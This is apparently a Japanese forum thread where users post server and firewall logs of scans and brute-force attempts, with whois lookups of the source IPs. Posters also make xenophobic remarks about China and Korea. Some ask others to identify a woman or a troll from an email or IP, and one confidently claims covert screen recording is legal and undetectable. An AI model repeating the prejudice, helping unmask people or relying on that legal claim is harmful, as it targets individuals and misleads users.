210.191.208.201 - - [24/Dec/2005:00:32:22 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 289 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:23 +0900] "POST /xmlrpc.php HTTP/1.1" 404 279 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:24 +0900] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 286 "-" （略）
210.191.208.201 - - [24/Dec/2005:00:32:25 +0900] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 286 "-" （略）

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.191.208.192/27
b. [ネットワーク名] HAKODATE-C01
f. [組織名] 野又学園函館大学
g. [Organization] Hakodate University

あなたが検索されたアドレス［ 222.10.249.227 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.10.249.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/04/28
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.10.0.0/15

トロイ探索屋さん、おつとめご苦労様です

219.129.25.220:3826

inetnum: 219.129.25.208 - 219.129.25.223
netname: ZHANJIANG-ZHUYOUBIN-LTD
country: CN

中国のスーパーハカー？

83.233.7.102

ｳｻﾞｰ

>>271
219.146.161.10
はうちにも来たよ…
いいかげんにしてくれって感じだ。

ルータに毎日のように不正アクセスログが表示されるのですが
進入されたのでしょうか？
それとも進入しようとして失敗してるのでしょうか？
何処を見ればわかるのでしょう

212.208.64.208

うぜー

>>355
設定も示さず、ログも示さずじゃ、わかりっこない。

221.245.27.50
inetnum: 221.245.27.48 - 221.245.27.55
netname: USKG0001D110
descr: KETOS
country: JP
admin-c: AT047JP
tech-c: AT047JP
remarks: This information has been partially mirrored by APNIC from
remarks: JPNIC. To obtain more specific information, please use the
remarks: JPNIC WHOIS Gateway at
remarks: http://www.nic.ad.jp/en/db/whois/en-gateway.html or
remarks: whois.nic.ad.jp for WHOIS client. (The WHOIS client
remarks: defaults to Japanese output, use the /e switch for English
remarks: output)
changed: [email protected] 20040728
source: JPNIC

うぜ〜！

あなたが検索されたアドレス［ 222.8.221.181 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.8.221.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/03/25
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.8.0.0/16

ねえぼくちゃん、しつこいと逮捕しちゃうぞ♪

[18:03:37] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:03:40] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:13:21] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:13:24] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:35:17] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:37:39] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:46:34] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:47:03] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:50:47] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[18:51:10] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -
[18:53:15] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[19:22:08] <84.21.209.193> (149,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] POST /_vti_bin/_vti_aut/fp30reg.dll
[19:24:51] <84.21.209.193> (0,0) [異常なヘッダーを受信しました] - -

めずらしいお客さん

一連の、xmlrpc.php へpostログですが、実際にphpファイル置いて
ウインドウオープンさせるスクリプトなど置いた場合、こっちも悪いやつ
になっちゃいますか? それともpostだから動かない?

理屈は知っているからファイアーウォールに全部お任せで、
外部パケットは全部遮断。
ログなんてもう見てもしゃあないから取っていない。
静か　静か　だけどDOS攻撃されたら100倍にして返してやるから覚悟しろよ。

>>361
おいおい、あれを人がブラウザからポチポチやっていると思ってんのか？

シナ方面のバカからしか来ないから全部無視しとけ

みなさんもシナから受けてるんですね。自分もでしたのでなんかホッとします。ハイ。

グローバルなIPアドレスってなんだかなぁ〜って気がします。
どうして国別に分かる番号を埋めなかったのでしょうか。
閉めるにしても、たくさん有り過ぎる!

>>366
サーバー立ててなきゃ通す必要性がないだろう
それとも、なんかのサービスに外部からアクセスする必要があるのか？

>>366
ああ　ゲーム厨かよw

外国を閉めるんじゃなくて、日本だけ開けとけばよござんす。
JPNIC管轄と、APNIC管轄でJPNIC管理のもの、合計で344行以下で範囲指定できるはず。

本当にゲーム程度の事なら全部開けときゃいいじゃんって気もする
ゲームのセキュリティーホールがそんなに心配か？
もし突かれたらシステム全体が危険になるほどそのゲームは重要な位置にあるのか？
このケースがどうなのかは知らんが、目的と手段が入れ替わってるような奴をたまに見かける

実際にネットゲームはヤバイよ
そのポートでリモートコントロール出来るように作られていれば、
理論上は何をするのでも可能
キーロガーをインストールするのも情報ファイルを盗むのでも

要は他のトロイと一緒できっかけは１つで十分
ポートが開けばそれを使ってリモート操作すればいいだけ
普通は開いていたとしてもファイアーウォールが遮断してくれるんだけどね

鯖立てると必ずゲームポート突付いてくるんだよなあ

>リモートコントロール
たかだかネットゲームにどの程度の権限がある事やら
バグ持ちのftpやhttpより危険なネトゲの具体例があったっけ？
危険があったとしても、少なくともリモートコントロールよりは別種のバグの方が怖そうだ

というか>>366は一言もゲームだなんて言ってないだろ
ネットゲームだなんて妄想に乗る方がおかしいｗ

あらゆるIPからポート7743を突かれる
winnyやってないのに

366des
Webとメールサーバ立ててます。
日本だけじゃダメで外国とのメールのやりとりもあるので無理。
チャイナと半島さえクリアすれば９９%!という話も聞きますので。
あのあたりは物理的に隔離した方がいいんでないのか!と国連決議希望。

こんな時間に大阪キタか。
ふみんかな？

>あのあたりは物理的に隔離した方がいいんでないのか

これには激しく同意

2名様ご案内♪
220.87.24.82(KR)
200.14.96.57(CL)

[02:33:55] <220.87.24.82> (213,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats/awstats.pl
[02:33:55] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/awstats.pl
[02:33:56] <220.87.24.82> (201,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/awstats.pl
[02:33:56] <220.87.24.82> (205,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats/awstats.pl
[02:33:56] <220.87.24.82> (211,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi-bin/stats/awstats.pl
[02:33:57] <220.87.24.82> (203,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /stats/awstats.pl
[02:33:57] <220.87.24.82> (197,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /awstats.pl
[02:33:58] <220.87.24.82> (207,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cgi/stats/awstats.pl

[03:04:33] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:34] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:35] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:37] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:38] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -
[03:04:40] <200.14.96.57> (0,0) [ヘッダー受信中に切断しました] - -

あなたが検索されたアドレス［ 222.228.18.35 ］のJPNICからの応答は以下の通りです。

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.228.18.0/24
b. [ネットワーク名] V-FLETS
f. [組織名] グローバルソリューション株式会社
g. [Organization] Global Solution K.K.
m. [管理者連絡窓口] IH010JP
n. [技術連絡担当者] MA2355JP
p. [ネームサーバ] ns1.vectant.ne.jp
p. [ネームサーバ] ns2.vectant.ne.jp
[割当年月日] 2004/05/25
[最終更新] 2004/05/25 11:42:03(JST)

上位情報
----------
グローバルソリューション株式会社 (Global Solution K.K.)
[割り振り] 222.228.0.0/16

おたくさんのユーザーさんにはやんちゃものがいるようですね？

sshを5秒に一回ペースでノックされていかれました。
221.135.33.92

・・・インド？鯖立て初心者の私は恐怖でガクブルです。

195.39.35.48氏ね

おまいらに頼みが;;
旦那が女つくって出ていった…
女の携帯アドレスから電話番号や名前を特定することって可能ですか?
お願いします

210.81.153.192ってドコよ？

>>383
離婚して俺と結婚しないか

>>384
自己れす
210.81.153.192/5000
ttp://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040518/144341/
これか？？？
１秒間に１０回来る。うざい。

>>381
まず、/etc/hosts.{allow,deny}で閉めとく。Windowsなら分からん。
それから、

IP：202.146.24.166
兵庫県明石市より、先ほど5分間にわたるNewTear攻撃が。
回数はおよそ30。

inetnum: 202.248.24.160 - 202.248.24.191
natname: JMD-NET
descr: JAPAN MUSIC DATA CO LTD.

SMURF攻撃
IPアドレス 207.38.8.28
ホスト名 aphexmaster2.gamespy.com
IPアドレス割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IPアドレス 211.186.233.203
ホスト名 登録なし

[Querying whois.nic.or.kr]
[whois.nic.or.kr]


IPアドレス 211.133.63.152
ホスト名 ntgifu055152.gifu.nt.ftth.ppp.infoweb.ne.jp

ところで、>>389みたいな情報ってどこでわかるの？

softbank219184048022.bbtec.net

219.122.18.191 (c018-191.intsurf.ne.jp)
/p2/read.php漁り乙w

[07:06:28] <210.206.137.4> (208,0) [あなたのアクセスしたURLは、このサーバの管理下ではありません] GET /cacti/graph_image.php

うちじゃ叩いても何も出ないよー

222.15.110.69

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 222.15.110.0/24
b. [ネットワーク名] KDDI-NET
f. [組織名] DION (KDDI株式会社)
g. [Organization] DION (KDDI CORPORATION)
m. [管理者連絡窓口] JP00000127
n. [技術連絡担当者] JP00000181
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns10.dion.ne.jp
p. [ネームサーバ] dns2.dion.ne.jp
p. [ネームサーバ] ns1.neweb.ne.jp
[割当年月日] 2004/09/30
[最終更新] 2005/07/27 13:53:51(JST)

上位情報
----------
KDDI株式会社 (KDDI CORPORATION)
[割り振り] 222.12.0.0/14

ぼかー、トロイには感染しておりませぬ。

226.223.148.200
初めて侵入検知した

ノートン入れているんだけど
セキュリティ無効にしないとなぜかこの板にアクセスできない。
有効にすると「ページを表示できません」とでる

>>395

【インターネットセキュリティ入れたら2ちゃんに書き込めない場合】
　1.インターネットセキュリティ起動。
　2.真ん中あたりの「プライバシー制御」をクリック。
　3.右下あたりの「拡張」クリック。
　4.左下の「サイトを追加」をクリック。
　5.WWW.を消して「2ch.net」と文字を入れる。
　6.左上デフォルトのすぐ下に「2ch.net」と表示されるのでそれをクリック。
→青い反転文字になる。
　7.右半分の真ん中あたり「表示したサイトについての情報」欄,
「デフォルト設定を使う」のチェックをはずす。
　8.「許可」をクリック。
　9.あとはO.K O.K.

inetnum: 218.222.104.0 - 218.222.127.255
netname: KDDI-NET
descr: DION (KDDI CORPORATION)
country: JP
admin-c: JP00000127
tech-c: JP00000181

61.121.100.29
TCP SYN FLOOD攻撃を
2006/01/03 00:04:05 - 2006/01/03 22:18:26
に25回
ポートスキャンを
2006/01/03 22:14:02 - 2006/01/03 22:18:58
に12回も行っている。
何者なんだろ・・・

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.100.0/24
b. [ネットワーク名] NIFTY-SERVE
f. [組織名] ニフティサーブ ネットワーク(ニフティ株式会社)
g. [Organization] NIFTY SERVE NETWORK(NIFTY Corporation)
m. [管理者連絡窓口] YN006JP
n. [技術連絡担当者] KS1046JP
n. [技術連絡担当者] YN917JP
p. [ネームサーバ] ns0.nifty.ad.jp
p. [ネームサーバ] ns1.nifty.ad.jp
[割当年月日] 2001/07/16
[最終更新] 2001/07/16 22:32:02(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。

>>396
試したけどだめだった。
だけど>>395の不正アクセスしてきたＩＰ制限解除したら
アクセスできなかった板にアクセスできるようになった。
とにかくありがとう。

>>399
エクスプローラーで２ちゃん見てるなら専用ブラウザ入れた方がいいよ

乱立する2ch用ブラウザの比較 Part23
http://pc7.2ch.net/test/read.cgi/software/1127784246/

好きなの入れて。

あとこれも
【ノートン入れたら２ｃｈに書きこめない】人へ18
http://etc3.2ch.net/test/read.cgi/qa/1112631967/

>>400
一番下のURLにアクセスしたら侵入検知が作動したんだけど。
206.223.150.175

これってどういうこと？
パソコン詳しくないから全くわからん。

2chのプロキシー確認じゃないの？

しつこいぞ
TCP SYN FLOOD攻撃
IPアドレス 218.64.186.131
ホスト名 対応するホスト名がありません
IPアドレス割当国　※ 中国 (CN)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

何度やっても無駄だから

mm-***-***-***-**.dialup.mgts.by
mm-***-***-***-**.adsl.mgts.by

年末年始に、
掲示板&ブログにスクリプトで書き込みしやがる。

>>401
そこはメールアドレスに特定の文字列をいれるとノートン先生が反応するってスレ
で、その特定の文字列を、そのスレに書いたやつがいるから侵入検知が作動している。

>>405
ありがとうございます

IPアドレス 193.65.41.35
ホスト名 proxy2.lasipalatsi.fi
IPアドレス
割当国　※ フィンランド (FI)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

まじウザい。そんな頻繁にやるな。

64.237.38.118からSYN FLOOD、ポートスキャン頂いてます。
今日の21時から今までで

SYN FLOOD・・・948回
ポートスキャン3995回

ｷﾓｽｗｗIP変えよ。

125.192.65.120
FLH1Aba120.iba.mesh.ad.jp

hosts.deny
ALL:中国

70.37.42.73


Non-authoritative answer:
73.42.37.70.in-addr.arpa name = temecula-cuda1-70-37-42-73.ontrca.adelphia.net.

Authoritative answers can be found from:
42.37.70.in-addr.arpa nameserver = ns1.adelphia.net.
42.37.70.in-addr.arpa nameserver = ns2.adelphia.net.
42.37.70.in-addr.arpa nameserver = ns3.adelphia.net.
ns1.adelphia.net internet address = 24.50.78.2
ns2.adelphia.net internet address = 68.168.224.177
ns3.adelphia.net internet address = 68.168.192.17

61.44.82.20


Non-authoritative answer:
20.82.44.61.in-addr.arpa name = 20.82.44.61.ap.seikyou.ne.jp.

Authoritative answers can be found from:
82.44.61.in-addr.arpa nameserver = NS1.FreeBit.NET.
82.44.61.in-addr.arpa nameserver = NS2.FreeBit.NET.
NS1.FreeBit.NET internet address = 210.143.144.11
NS2.FreeBit.NET internet address = 210.143.144.12

61.152.199.195:80

TCP SYN FLOOD攻撃 12.158.80.10 221.79.152.41 2006/01/08 12:02:55 - 2006/01/08 12:05:30 9
219.103.130.29 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14
219.103.130.30 221.79.152.41 2006/01/08 11:09:51 - 2006/01/08 11:18:23 14
210.136.158.72 221.79.152.41 2006/01/08 10:20:48 - 2006/01/08 11:13:33 184
219.188.199.165 221.79.152.41 2006/01/08 03:39:49 - 2006/01/08 03:42:07 9
211.13.211.3 221.79.152.41 2006/01/08 03:35:56 - 2006/01/08 03:37:57 6

　

206.223.152.55
206.223.152.30

USから攻撃されてる。

220.134.13.167(TW)
218.104.211.118(CN)

.csv形式の国別IPリストがあればいいんだけどねぇ

219.108.40.29

今日はコレが一番多かった

荒らしがアドレスを抜かれた。
でも懲りずにメチャクチャに荒らしを続けている。
なんとかできないものでしょうか。

459 2006/01/01 02:51:46 ID:2EoNwRdV 　 メイド達の大和 fi-202231173-49.urban.ne.jp

【ご主人様と】メイドさんでエロパロ【呼ばれたい】
http://sakura03.bbspink.com/test/read.cgi/eroparo/1116429800/
402,403,406-409,411,413,420,421,423,424-426,428,433-438,440,442,443,445,
454,459-462,464,470-475,477,485-490,492,502,517,525,533,539-540,555,559-565,
568-569,582-584,588,590-592,595-596

該当スレ
男が女に犯されるやつ
メイドさんでエロパロ
女性上位で優しく愛撫される小説ver4
兄弟を虐待する姉妹のSS 二日目
苺ましまろｴﾛﾊﾟﾛｽﾚｯﾄﾞ　苺２こ
ネット上の駄目なエロＳＳ　第五章
少女が年上の男を弄ぶ作品ＰＡＲＴ４
ｼﾝｼﾞが女性ｷｬﾗに虐められるSSｽﾚ
女の子にいじめられる　
エロパロ板自治スレッド7

誰か教えてください。
ログをとってたら
まったく身に覚えの無いアクセスがあります。
（うちのHPアドレスは家族しか知らないので）

　hinet-ip.hinet.net　台湾

ドメインがHINETで国籍が台湾みたいです。
これって、どういう方が
どういう意図で
どうやってアドレスを知って
みているのでしょうか？
初心者の私に教えてください。

せんせえーー

220.148.7.213

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 220.148.0.0/18
b. [ネットワーク名] TOKAI-NET
f. [組織名] 株式会社ザ・トーカイ
g. [Organization] TOKAI CO.Ltd.
m. [管理者連絡窓口] MT7711JP
n. [技術連絡担当者] KK11421JP
n. [技術連絡担当者] MI5375JP
p. [ネームサーバ] dns0.tokai.or.jp
p. [ネームサーバ] dns1.tokai.or.jp
p. [ネームサーバ] dns2.tokai.or.jp
[割当年月日] 2003/11/18
[最終更新] 2003/11/18 09:42:08(JST)

上位情報
----------
株式会社ザ・トーカイ (TOKAI CO.Ltd.)
[割り振り] 220.148.0.0/16

この人がトロイを探し回って個人情報を盗もうとしています！！
つかまえてください！！

61.172.250.36

IPアドレス　61.126.193.61
から攻撃されたんだけど、どうにかなるんですか？
初めてで判らないから教えて下さい！！

これはもう、ダメかもしれんね。

203.168.117.197

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 211.10.16.0/25
b. [ネットワーク名] CLARA
f. [組織名] 株式会社クララオンライン
g. [Organization] Clara Online, Inc.
m. [管理者連絡窓口] KI1054JP
n. [技術連絡担当者] KI1054JP
p. [ネームサーバ]
[割当年月日] 2000/08/18
[返却年月日]
[最終更新] 2000/08/18 19:54:04(JST)

上位情報
----------
ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
[割り振り] 211.10.16.0/20
ケーブル・アンド・ワイヤレス・アイディーシー株式会社 (Cable & Wireless IDC Inc.)
SUBA-113-016 [SUBA] 211.10.16.0/24

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 218.231.163.0/24
b. [ネットワーク名] EACCESS
f. [組織名] イー・アクセス株式会社
g. [Organization] eAccess Co.,Ltd.
m. [管理者連絡窓口] YO1846JP
n. [技術連絡担当者] HO1626JP
p. [ネームサーバ] ns1.eaccess.ne.jp
p. [ネームサーバ] ns2.eaccess.ne.jp
[割当年月日] 2002/07/11
[返却年月日]
[最終更新] 2004/04/15 10:07:37(JST)

上位情報
----------
イー・アクセス株式会社 (eAccess Ltd.)
[割り振り] 218.231.128.0/17

OrgName: Microsoft Corp
OrgID: MSFT
Address: One Microsoft Way
City: Redmond
StateProv: WA
PostalCode: 98052
Country: US

NetRange: 207.46.0.0 - 207.46.255.255
CIDR: 207.46.0.0/16
NetName: MICROSOFT-GLOBAL-NET
NetHandle: NET-207-46-0-0-1
Parent: NET-207-0-0-0-0
NetType: Direct Assignment
NameServer: NS1.MSFT.NET
NameServer: NS5.MSFT.NET
NameServer: NS2.MSFT.NET
NameServer: NS3.MSFT.NET
NameServer: NS4.MSFT.NET
Comment:
RegDate: 1997-03-31
Updated: 2004-12-09

Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 202.224.152.0/21
b. [ネットワーク名] PANANETIP
f. [組織名] パナソニック ネットワークサービシズ株式会社
g. [Organization] Panasonic Network Services Inc.
m. [管理者連絡窓口] HK10267JP
n. [技術連絡担当者] HO205JP
p. [ネームサーバ] dns0.pana.net
p. [ネームサーバ] dns1.pana.net
[割当年月日] 1999/03/03
[返却年月日]
[最終更新] 2004/05/07 10:16:25(JST)

上位情報
----------
パナソニック ネットワークサービシズ株式会社 (Panasonic Network Services Inc.)
[割り振り] 202.224.128.0/18

126.64.94.129
softbank126064094129.bbtec.net

60.68.23.12
softbank060068023012.bbtec.net

ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね？
それと、そういうのしてるとバレます？？

ライブチャットの動画画面をデスクトップ録画するってことは違法なんですかね？
それと、そういうのしてるとバレます？？

１、行為自体は合法、それをネットなどで公開すれば違法でFA
２、ばれません

２度ｶｷｺすな

１、行為自体は合法、それをネットなどで公開すれば違法でFA
２、ばれません

２度ｶｷｺすな

63.247.81.*
80.239.107.*
150.156.16.*

kaniwww.city.kani.gifu.jp(210.172.197.20)

SMURF攻撃
IPアドレス 207.38.8.27
ホスト名 aphexmaster1.gamespy.com
IPアドレス割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

IP SPOOFING攻撃　from 192.168.83.47

Jan 13 14:18:28 *** sshd[**]: Did not receive identification string from 219.163.129.92
Jan 13 14:24:07 *** sshd[**]: Illegal user library from 219.163.129.92
Jan 13 14:24:08 *** sshd[**]: Illegal user cyrus from 219.163.129.92

inetnum: 219.163.129.88 - 219.163.129.95
netname: NETXJAPNKK
descr: NetXposure Japan K.K.

>>438
それは笑うところ？

>>438
>>438
>>438
>>438
>>438

NMap Xｍas Scan攻撃って何すか？

Did not receive identification string from 222.228.90.132

inetnum: 222.228.90.0 - 222.228.90.255
netname: V-FLETS
descr: グローバルソリューション株式会社
country: JP

乙

201.128.9.*
193.23.115.*

やれやれだな

Jan 15 18:26:05 *** sshd[8924]: Did not receive identification string from 131.112.80.22
Jan 15 18:28:52 *** sshd[8933]: input_userauth_request: illegal user mata
Jan 15 18:28:52 *** sshd[8933]: Failed password for illegal user mata from 131.112.80.22 port 59283 ssh2
Jan 15 18:28:52 *** sshd[8933]: Received disconnect from 131.112.80.22: 11: Bye Bye
(略)
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 131.112.0.0/16
b. [ネットワーク名] TITANET
f. [組織名] 東京工業大学
g. [Organization] Tokyo Institute of Technology

東工大もやるなぁｗ

221.188.128.46
p3046-ipad04fukui.fukui.ocn.ne.jp
202.70.215.85
flets-202-70-215-85.client.pikara.ne.jp

210.141.112.163

136.187.88.68
honiden-proj.ex.nii.ac.jp
f. [組織名] 国立情報学研究所
g. [Organization] National Institute of Informatics

やばい、国の機関に目つけられたｗ

>>448
アダルトサーバーでも立てているのか？

Jan 14 20:25:05 *** sshd[29532]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=dualpc0.iis.u-tokyo.ac.jp
東大

Jan 15 08:26:19 *** sshd[10402]: (pam_unix) authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=219x123x39x114.ap219.ftth.ucom.ne.jp
EPIONTECH CO.,Ltd

ENTE MILITARE ALLEATO USA/NATO-US NAVY NAPOL

えらいとこからきたw

パソコン持って逃げろ

85.37.190.232:8619 udp4
ENTE MILITARE ALLEATO USA/NATO-US NAVY

いや、おいら軍事に関わるものなんて何も持ってなし、とりたてて悪い事やってねーつーのw
軍と付くものといえば、ケロロ軍曹のDVDくらいしかないよ(´･ω･`)

>>451
10分後には黒塗りの車がくるぞ

エシュロン？

219.102.54.134
445番ポート狙ってきてるんだが

SMURF攻撃180回
2006/01/10 17:35:22 - 2006/01/16 15:33:13
IPアドレス 207.38.8.27
ホスト名 aphexmaster1.gamespy.com
IPアドレス割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

エシュロンってなつかしいなw

192.168.24.55:3067　等のローカルアドレスから、
家のサーバにpingでは無い不規則なアクセスログがよくある。
一人暮らしで、昼間は仕事でいない。
昼間に立ち上げてるのはそのサーバのみ。
その間、他にLANに繋がってる機器は無いはず。
無線LANは無いから外部からでは無いと思うんだが・・・。
どういった可能性がある？教えてエロい人。

>>459
何が残したログだよ。

IPアドレス 206.223.150.120
ホスト名 tiger505.maido3.com
IPアドレス
　割当国　※ アメリカ合衆国 (US)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

ノートン先生が騒いでおります。

>>461
そこはIn,Outともに弾いたほうがいいよ

>>462 さん
すみません。Ｉｎ，Ｏｕｔとはなんですか？

>>462 さん
すみません。自己解決しました。

>>461
これ2ちゃんの鯖やん？

だから462が面白いんだろｗ

ポートスキャン49回

IPアドレス 202.93.87.190
ホスト名 f32.mail.vip.bbt.yahoo.co.jp
IPアドレス割当国　※ 日本 (JP)
都道府県 該当なし
市外局番 該当なし
接続回線 該当なし

氏ね

すみませんがこのIP抜いてもらえますか?
この荒しは中傷激しいんです。
自分ﾊﾞｶなもんでIP抜けないんですお。
222.7.56.143
おねがいします。

バカとか初心者とか自分で言えば
不勉強の免罪符になるとでも思っているのかね？
バカだと思うならあきらめなさい
PHSだし

>>467
お前ヤフーメール使うの禁止

>>470
元々使ってないから書き込んだんだけど

>>470
どう答える？

Relaying denied:
From ip-209-172-61-87.reverse.privatedns.com[209.172.61.87]
to [email protected] : 1 Time(s)

こやつはsshアタックしてきたり、smtpアタックしてきたり。

常連ですか？

ポート1026あたりの叩きがまた増えてきた

218.222.164.94
逝ってヨシ

ヤフーメールって使うとポートスキャンしてくるの？
何のために？

>>470
ヤフーメールを使ってればポートスキャンされてもしかたない
と言う意味に取れるがそのへんのトコ>>476に答えてやれ

あとオマエが早とちりで使用禁止した>>471は使ってないのに
ポートスキャンされてるらしいのでコメントしてやれ

CATVなんじゃね？

みんなIP抜くのにどんなツール使っている？

64.124.85.210.become.com

>>479
apacheのログ。

Domain Information: [ドメイン情報]
a. [ドメイン名] KDDI.NE.JP
b. [ねっとわーくさーびすめい] けーでぃーでぃーあい
c. [ネットワークサービス名] KDDI
d. [Network Service Name] KDDI
k. [組織種別] ネットワークサービス
l. [Organization Type] Network Service
m. [登録担当者] KT6192JP
n. [技術連絡担当者] SH1304JP
p. [ネームサーバ] dns0.dion.ne.jp
p. [ネームサーバ] dns1.dion.ne.jp
[状態] Connected (2006/12/31)
[登録年月日] 1999/12/27
[接続年月日] 2000/10/02
[最終更新] 2006/01/01 01:18:21 (JST)

IPアドレス　210.155.101.159
ホスト名 VV043000140128101155210031.gwrev.kddi.ne.j
　割当国　※ 日本 (JP)


こいつしつこい｡死ね｡

ccTLD国名検索�
�IPアドレス��61.121.9.87�
�ホスト名��nttyma031087.tyma.nt.ftth.ppp.infoweb.ne.jp�
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 61.121.0.0/18
b. [ネットワーク名] INFOWEB
f. [組織名] InfoWeb(富士通株式会社)
g. [Organization] InfoWeb(Fujitsu Ltd.)
m. [管理者連絡窓口] KH071JP
n. [技術連絡担当者] KN6902JP
n. [技術連絡担当者] TK13654JP
p. [ネームサーバ] ns1.hyper.web.ad.jp
p. [ネームサーバ] ns3.hyper.web.ad.jp
[割当年月日] 2000/12/12
[返却年月日]
[最終更新] 2003/11/07 11:47:32(JST)

上位情報
----------
富士通株式会社 (FUJITSU LIMITED)
[割り振り] 61.121.0.0/17

下位情報
----------
該当するデータがありません。

IPアドレス　210.173.169.161
ホスト名 www3.asahi.com
割当国　※ 日本 (JP)

Registrant:
Asahi Shimbun Tsukiji Chuo-ku
Tokyo
No Valid City, No Valid State
JP

Domain Name: ASAHI.COM

Administrative Contact:
Oaawaa, akoto [email protected]
Asahi Shimbun Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949 +81-3-5541-8687


なんだこれ('A`)
iia, ysue [email protected]
Asahi Shimbun
5-3-2 Tsukiji
Chuo-ku, Tokyo 1048011
JP
+81-3-5541-8949

IPアドレス 210.159.238.64
ホスト名 PPPax814.kanagawa-ip.dti.ne.jp
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.159.208.0-210.159.255.255
b. [ネットワーク名] DTI-NET
f. [組織名] 株式会社 ドリーム・トレイン・インターネット
g. [Organization] DREAM TRAIN INTERNET INC.
m. [管理者連絡窓口] MH4804JP
n. [技術連絡担当者] MK10931JP
p. [ネームサーバ] ns.dti.ad.jp
p. [ネームサーバ] ns2.dti.ad.jp
[割当年月日] 2000/03/23
[返却年月日]
[最終更新] 2004/09/08 12:28:11(JST)
上位情報----------
株式会社 ドリーム・トレイン・インターネット (Dream Train Internet Inc.)
[割り振り] 210.159.128.0/17

こいつうざい

IPアドレス 203.216.240.161
ホスト名 cs1.msg.tnz.yahoo.co.jp
IPアドレス
　割当国　※ 日本 (JP)
Network Information: [ネットワーク情報]
